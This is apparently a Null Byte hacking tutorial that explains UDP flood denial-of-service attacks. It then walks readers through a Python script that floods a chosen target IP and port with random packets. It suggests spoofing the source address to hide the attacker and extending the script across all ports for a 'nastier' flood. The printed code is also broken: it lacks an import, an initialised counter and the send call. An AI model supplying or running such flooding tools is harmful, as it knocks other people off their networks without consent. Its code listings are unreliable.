UDP Flooding: How to Kick a Local User Off the Network
Only so much data can be passed through the network and to your computer's networking interfaces. This is limited by the amount of bandwidth you have. The more bandwidth you have, the faster your network connections will be. Not only this, but your transfers will be more parallel and distributed so that all of your speed isn't taken up by one transfer. When all of your bandwidth is sapped and unable to be used, this is called a denial of service, or a DOS.
A DOS can be forced on a computer in a bunch of ways. One of the many ways that we can cause a DOS could be by finding and exploiting a service running on a remote host. We could cause the program to loop or react in a way that it wasn't intended to, causing the remote host to use all of its resources, effectively taking it offline. We could also trigger what is called a UDP flood.
A UDP flood attack can be initiated by sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will:
- Check for the application listening at that port.
- See that no application listens at that port.
- Reply with an ICMP Destination Unreachable packet.
Thus, for a large number of UDP packets, the victimized system will be forced into sending many ICMP packets, eventually leading it to be unreachable by other clients. The attacker may also spoof the IP address of the UDP packets, ensuring that the excessive ICMP return packets do not reach him, effectively anonymizing the attacker's location on the network.
This Null Byte is going to show you how to code a simple UDP flooding script in the Python programming language.
Open up a notepad and paste the code below into it.
import socket #Imports needed libraries
sock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) #Creates a socket
bytes=random._urandom(1024) #Creates packet
ip=raw_input('Target IP: ') #The IP we are attacking
port=input('Port: ') #Port we direct to attack
while 1: #Infinitely loops sending packets to the port until the program is exited.
print "Sent %s amount of packets to %s at port %s." % (sent,ip,port)
sent= sent + 1
Save the code as udpflood.py with the all files option selected in notepad. To execute the code, simply open up IDLE and run the code in it. It will prompt you for the information that you need to enter.
This attack is directed at just one port, to make a really nasty UDP flood, you need to make it loop through a list of the 65,535 available ports. This can be added very easily, I'm just using it as a way to engage your mind. If you follow logic closely, you don't even have to be a programmer to understand how to add this feature. You can just examine the code! Post below if you figure it out.
Be a Part of Null Byte!